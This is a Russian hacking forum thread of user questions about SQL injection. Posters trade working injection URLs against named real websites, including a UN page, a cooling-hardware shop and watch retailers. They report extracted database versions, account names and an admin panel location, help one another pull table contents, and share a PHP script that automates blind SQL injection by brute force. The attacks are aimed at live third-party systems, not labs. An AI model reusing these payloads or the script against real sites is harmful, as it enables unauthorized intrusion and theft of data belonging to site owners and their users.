Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Серёжа393

    Joined:
    28 Dec 2009
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Шас написал тестовый скрипт, чтобы потренероваться со скулями на локалхосте, так вот почему чтобы вывести поле из таблицы надо чтобы было минимум три выводимых поля? или я ошибаюсь? подскажите плиз.
     
  2. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    Ты ошибаешься.
    Может быть и одно...
     
  3. Серёжа393

    Joined:
    28 Dec 2009
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Блин, простите, работает. просто не павраильно имя таблицы написал...
     
  4. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    67
    Likes Received:
    90
    Reputations:
    52
    Нужно вначале назначить 2 значения.
    Ну или так.
    http://zero10.us/m.php?id=2435+and+1=(select+*+fro m(select+*+from+information_schema.tables+a+JOIN+inf ormation_schema.tables+b)c)--
     
    #10904 v1d0qz, 1 Jan 2010
    Last edited: 1 Jan 2010
    1 person likes this.
  5. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    SQL запрос сделать при такой ошибке можно сделать? В запрос подставлил одинарную кавычку
     
  6. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    С чего ты взял, что это некорректная обработка? Вариантов много, и шансов нет никаких, пока нет самого сайта.
     
  7. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    ok
    http://www.bestwatch.ru/watches.phtml?idb=168&idl=2618
    http://www.luxwatch.ru/watches.phtml?idb=168
     
  8. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    скуля есть что в 1 что во 2 варианте и логические операции об этом хорошо говорят
    Code:
    http://www.luxwatch.ru/watches.phtml?idb=-168+union+select+version()
    
     
  9. DeluxeS

    DeluxeS Member

    Joined:
    1 Aug 2009
    Messages:
    7
    Likes Received:
    81
    Reputations:
    19
    Спасибо, оперативно вы..
     
    1 person likes this.
  10. Stalingrad

    Stalingrad Elder - Старейшина

    Joined:
    17 Mar 2006
    Messages:
    49
    Likes Received:
    4
    Reputations:
    0
    http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
    http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
    http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--

    version(): 4.0.27-standard
    user(): dbo273434928@localhost
    database(): db273434928
    Также есть таблица admin (+админка http://www.arctic-cooling.com/admin)

    jokester отредактировал мой пост в теме SQL Иньекций,поэтому постю сюда.У меня вопрос / прошения о помощи в этом случае.Кароче в первой ссылке вроде как 3 колонки но у меня ничего не получается вывести,кому не лень поиграйтесь с этой скулей плз.
     
  11. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    Code:
    http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20db_name%28%29%29--
    Имя базы данных : News
    Code:
    http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28select%20system_user%29--
    Владелец : web
    Code:
    http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=@@version--
    Версия : Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)

    Теперь таблицы и колонки

    Code:
    http://www.un.org/sg/articleFullsearch.asp?TID=1%20or%201=%28SELECT%20TOP%201%20TABLE_NAME%20FROM%20INFORMATION_SCHEMA.TABLES%29--
    Одна из таблиц: failedemails

    А дальше сделать ничего не выходит. Никто не поможет? Может в том,что сделано ошибки есть? :(
     
  12. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =(

    Jerri,

    http://www.un.org/sg/articleFullsearch.asp?TID=1+or+1=(select+top+1+failedemailaddress+from+newsadmin.failedemails)--+
     
  13. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Нашел =)

    http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--+
     
    4 people like this.
  14. Jerri

    Jerri Elder - Старейшина

    Joined:
    12 Jul 2009
    Messages:
    136
    Likes Received:
    377
    Reputations:
    22
    ElteRUS,спс.:)
     
  15. Stalingrad

    Stalingrad Elder - Старейшина

    Joined:
    17 Mar 2006
    Messages:
    49
    Likes Received:
    4
    Reputations:
    0
    А мне вот интересно всетаки,можно ли чтото сделать именно с первой ссылкой там где параметр подставляется в несколько запросов.Просто есть тема на античате https://forum.antichat.ru/showpost.php?p=1047720&postcount=74

    Там вот похожий случай,я пытался и так но не получалось.А за то что нашел спасибо :) , теперь надо подобрать колонки к таблице admin, но ниче не выходит.Может они на немецком/швейцарском :confused:
     
  16. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    вопрос! нашел слепую скуль на одном с порталов одного очень популярного ресурса!
    Возникают сразу два вопроса:
    1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ?
    2. Возникла проблема в переборе!

    Юзаю такой запрос:
    Code:
    +and+(select+lower(substring(user(),1,1))+from+information_schema.tables+limit+0,1)='a'
    Написал скрипт аналогов которому море,
    PHP:
    <form method="post">
    <input type="type" name="url" value="http://.html?h=15" size="150">
    limit <input type="type" name="ntab" value="17" size="1">,1
    <input type="submit" name="start" value="Start" style="cursor:pointer">
    </form>

    <?
    $brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_";
    //$brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_+!@#\$%^&*\ '\"()";
    $word = '<div class="clear mb25">'; //
    $url=$_POST['url']; //
    $ntab=$_POST['ntab'];

    if($_POST['start']){
        for($i=1;$i<=10;$i++){ // Позиція символа перебираємої таблиці
            for($j=0;$j<strlen($brutelist);$j++){ // Перебирання символа
                $linkout=@file_get_contents($url."+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+".$ntab.",1)='".$brutelist[$j]."'");
                preg_match_all($word,$linkout,$out);
                if(!$out[0][0]==""){
                    //echo "<br>".$i."[".$brutelist[$j]."] http://.html?h=15+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+17,1)='".$brutelist[$j]."'";
                    $fp=fopen("_.txt","a+"); 
                    fwrite($fp,$brutelist[$j]);
                    fclose($fp);
                }
                
            }
        }
    }
    ?>
    проблема долго юзать перебирать и все такое.. есть альтернатива.?
    читал статью _http://www.xakep.ru/post/49697/default.asp
    ошибок нет, ascii не разрешено юзать, ничего не выводит.
    Жду похорошо професионального ответа. ;)
     
    #10916 Micr0b, 4 Jan 2010
    Last edited: 4 Jan 2010
  17. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    reserse ip ?
     
    1 person likes this.
  18. Micr0b

    Micr0b Elder - Старейшина

    Joined:
    14 Jan 2006
    Messages:
    223
    Likes Received:
    168
    Reputations:
    26
    ну да чото забыл)
    Кстати проверил mail.ru выдал:
    Inbox.ru
    Mail.ru
    Porsche924.ru

    Тоже самое когда *.mail.ru
    Для болие точного результату спрошу, тоисть отрицательный?
     
  19. гаррет-тень

    Joined:
    21 Dec 2009
    Messages:
    67
    Likes Received:
    2
    Reputations:
    0
    я в html файле пишу <script>...</script>, а <html><head><title><bodyl><head><title><body> Писать?> Писать?
     
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Code:
    http://www.bank-referatov.info/info.php?id=106+and+1=1+and+substring(version(),1,1)=5
    
    @@basedir: /
    @@tmpdir: /tmp/
    database(): kupich_kur
    @@datadir: /var/lib/mysql/
    version(): 5.0.87-community
    user(): kupich_Kupich@localhost
    
    
     
    1 person likes this.
Thread Status:
Not open for further replies.